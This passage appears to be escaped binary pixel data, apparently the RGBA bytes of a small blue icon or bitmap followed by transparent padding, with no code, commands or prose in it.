xff0\x98\xea\xff:\x9d\xea\xffA\xa0\xea\xffG\xa3\xea\xffM\xa6\xea\xffR\xa8\xea\xffV\xa9\xea\xffZ\xab\xea\xff_\xad\xea\xffg\xb2\xeb\xff\x94\xcc\xf5\xffn\xad\xda\xff\x18k\xa9\xff\x00T\x98\xff\x00[\x9d\x9b\x00\\\x9e\x18\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e/\x00Y\x9c\xbd\x00W\x99\xff%z\xb7\xffB\xa0\xea\xff;\x9e\xec\xffK\xa6\xed\xffY\xad\xed\xff_\xaf\xed\xffc\xb2\xed\xffh\xb4\xed\xffm\xb6\xed\xffp\xb8\xec\xff}\xbd\xee\xff\xa8\xd4\xf4\xff\xbe\xdf\xf8\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xffx\xbe\xf1\xffq\xb9\xf0\xff@\xa0\xeb\xff5\x9b\xea\xffA\xa0\xea\xffG\xa3\xea\xffM\xa6\xea\xffS\xa9\xea\xffZ\xab\xea\xff]\xae\xea\xff]\xac\xea\xffk\xb3\xeb\xff:\x87\xbf\xff\x00X\x9a\xff\x00X\x9b\xd1\x00\\\x9eD\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x03\x00[\x9d\xb6\x00[\x9e\xffi\xb2\xe8\xffq\xbc\xf4\xffT\xaa\xed\xffV\xaa\xed\xff^\xaf\xed\xffc\xb2\xed\xffh\xb4\xed\xffj\xb5\xec\xffz\xbd\xee\xff\xa9\xd5\xf5\xff\xb9\xdd\xf8\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff~\xbf\xf1\xff|\xbe\xf0\xffM\xa6\xeb\xff;\x9d\xea\xffG\xa3\xea\xffM\xa6\xea\xffS\xa9\xea\xffW\xaa\xea\xff]\xae\xea\xff\x84\xc1\xee\xff\x9c\xc9\xea\xff\ta\xa1\xff\x00Y\x9b\xcd\x00\\\x9e\x0e\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00[\x9d\x8c\x04_\xa1\xff~\xbc\xea\xff\x9c\xd2\xfa\xff\x8a\xc7\xf5\xffg\xb4\xef\xffY\xad\xec\xffa\xb1\xed\xffd\xb2\xec\xff|\xbe\xef\xff\xa9\xd4\xf6\xff\xb3\xda\xf7\xff\xb6\xdb\xf7\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff{\xbe\xf1\xff\x83\xc2\xf1\xff\x88\xc4\xf1\xff^\xae\xed\xffB\xa0\xea\xffK\xa5\xea\xffN\xa6\xea\xffd\xb0\xeb\xff\x97\xca\xef\xff\xb7\xda\xf3\xff\xa9\xd0\xeb\xff\x0ef\xa4\xff\x00Z\x9c\xa7\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00[\x9d\x92\x04_\xa1\xff\x82\xbf\xee\xff\x98\xd0\xfb\xff\x99\xce\xf7\xff\x9a\xce\xf7\xff\x81\xc1\xf2\xffd\xb2\xed\xff~\xbf\xf0\xff\xa8\xd5\xf7\xff\xae\xd8\xf7\xff\xb1\xd9\xf7\xff\xb6\xdb\xf7\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\x
ff{\xbe\xf1\xff\x81\xc1\xf1\xff\x89\xc5\xf1\xff\x91\xc9\xf1\xffo\xb7\xed\xffN\xa6\xea\xffu\xb9\xed\xff\xa3\xd0\xf0\xff\xaf\xd6\xf1\xff\xb5\xda\xf4\xff\xaf\xd5\xef\xff\x0ef\xa4\xff\x00Z\x9c\xaa\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9em\x01[\x9d\xffT\x9c\xd1\xff\x98\xd0\xfb\xff\x9b\xd1\xfa\xff\x99\xce\xf7\xff\x9f\xd2\xf7\xff\x9a\xcf\xf6\xff\xa4\xd4\xf7\xff\xa9\xd6\xf7\xff\xac\xd7\xf7\xff\xb1\xd9\xf7\xff\xb6\xdb\xf7\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff{\xbe\xf1\xff\x81\xc1\xf1\xff\x88\xc4\xf1\xff\x8e\xc7\xf1\xff\x96\xcb\xf1\xff\x93\xc8\xf0\xff\xa3\xd0\xf1\xff\xa7\xd3\xf1\xff\xb3\xd9\xf5\xff\xae\xd4\xf0\xffZ\x98\xc7\xff\x03\\\x9d\xff\x00[\x9d{\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x16\x00[\x9d\xcd\x00W\x99\xff*z\xb6\xff\x85\xc0\xec\xff\xa3\xd6\xfd\xff\x9d\xd1\xf8\xff\xa0\xd3\xf7\xff\xa4\xd4\xf7\xff\xa8\xd5\xf7\xff\xac\xd7\xf7\xff\xb1\xd9\xf7\xff\xb6\xdb\xf7\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff{\xbe\xf1\xff\x81\xc1\xf1\xff\x88\xc4\xf1\xff\x8e\xc7\xf1\xff\x94\xca\xf1\xff\x9c\xcd\xf1\xff\xa3\xd1\xf2\xff\xb1\xd9\xf6\xff\x87\xba\xdf\xff!p\xac\xff\x00T\x99\xff\x00[\x9e\xb9\x00\\\x9e\x13\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x0b\x00\\\x9e\x81\x00V\x99\xf5\na\xa2\xff\\\x9f\xd2\xff\xa0\xd3\xf9\xff\xa6\xd7\xfb\xff\xa4\xd4\xf7\xff\xa8\xd5\xf7\xff\xac\xd7\xf7\xff\xb1\xd9\xf7\xff\xb6\xdb\xf7\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff{\xbe\xf1\xff\x81\xc1\xf1\xff\x88\xc4\xf1\xff\x8e\xc7\xf1\xff\x94\xca\xf1\xff\xa3\xd2\xf5\xff\x9e\xcd\xf0\xffQ\x95\xc6\xff\x03[\x9d\xff\x00W\x9a\xe9\x00\\\x9ei\x00\\\x9e\x01\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e.\x00Z\x9c\xb6\x00U\x99\xff(x\xb3\xff\x81\xbc\xe6\xff\xae\xdb\xfc\xff\xab\xd7\xf9\xff\xac\xd7\xf7\xff\xb1\xd9\xf7\xff\xb6\xdb\xf7\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\x
e3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff{\xbe\xf1\xff\x81\xc1\xf1\xff\x88\xc4\xf1\xff\x92\xca\xf3\xff\x9c\xd0\xf5\xffr\xae\xda\xff\x1dn\xab\xff\x00U\x99\xff\x00[\x9d\x9f\x00\\\x9e\x1d\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9ed\x00V\x99\xe9\x03[\x9e\xffL\x92\xc6\xff\xa1\xd0\xf3\xff\xb6\xde\xfc\xff\xb2\xda\xf7\xff\xb6\xdb\xf7\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff{\xbe\xf1\xff\x82\xc2\xf2\xff\x90\xca\xf6\xff\x82\xbe\xe9\xff8\x84\xbc\xff\x00X\x9b\xff\x00W\x9b\xd9\x00\\\x9eO\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x1c\x00[\x9d\x9f\x00T\x98\xff\x18j\xa8\xfft\xaf\xd9\xff\xb8\xde\xfa\xff\xbb\xdf\xfa\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff\x80\xc2\xf4\xff\x85\xc4\xf3\xffR\x9a\xcf\xff\rc\xa3\xff\x00U\x99\xf9\x00[\x9e\x88\x00\\\x9e\x0f\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9eG\x00X\x9b\xd0\x00V\x9a\xff=\x85\xbb\xff\xa3\xce\xee\xff\xc6\xe5\xfd\xff\xbf\xdf\xf8\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffo\xba\xf2\xff|\xc2\xf6\xffj\xb0\xe4\xff%w\xb4\xff\x00U\x99\xff\x00Z\x9c\xbc\x00\\\x9e3\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x08\x00\\\x9e{\x00T\x99\xf5\rb\xa2\xffk\xa5\xd0\xff\xbe\xdf\xf7\xff\xc
b\xe6\xfb\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffn\xbc\xf5\xffm\xb8\xf0\xff=\x8d\xc8\xff\x06^\x9f\xff\x00W\x99\xe9\x00\\\x9ed\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e0\x00Y\x9c\xbc\x00T\x98\xff*v\xb0\xff\x95\xc2\xe2\xff\xd0\xea\xfc\xff\xcd\xe6\xf9\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xffa\xb4\xf3\xffj\xb9\xf5\xffN\x9f\xda\xff\x15k\xab\xff\x00V\x98\xff\x00Z\x9d\xa7\x00\\\x9e \x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9ec\x00V\x9a\xe4\x01Y\x9c\xffS\x93\xc2\xff\xbf\xdd\xf2\xff\xd9\xee\xfc\xff\xc9\xe3\xf7\xffe\xb5\xf2\xff^\xb4\xf6\xffZ\xad\xeb\xff(}\xbc\xff\x00Y\x9b\xff\x00X\x9b\xd7\x00\\\x9eO\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x18\x00[\x9d\x9a\x00S\x98\xff\x1cl\xa8\xff\x8d\xb9\xda\xff\xd1\xe9\xfb\xffk\xba\xf5\xff;\x92\xd3\xff\x0cd\xa5\xff\x00V\x99\xf7\x00[\x9d\x85\x00\\\x9e\r\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00
\\\x9e\x00\x00\\\x9eA\x00X\x9b\xd2\x00V\x9a\xff?\x87\xbb\xff&z\xb8\xff\x00W\x99\xff\x00Y\x9c\xc3\x00\\\x9e1\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x0b\x00\\\x9e\x81\x00V\x9a\xf0\x00X\x9a\xf2\x00\\\x9eu\x00\\\x9e\x03\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x0f\x00[\x9et\x00\\\x9ex\x00\\\x9e\x0b\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\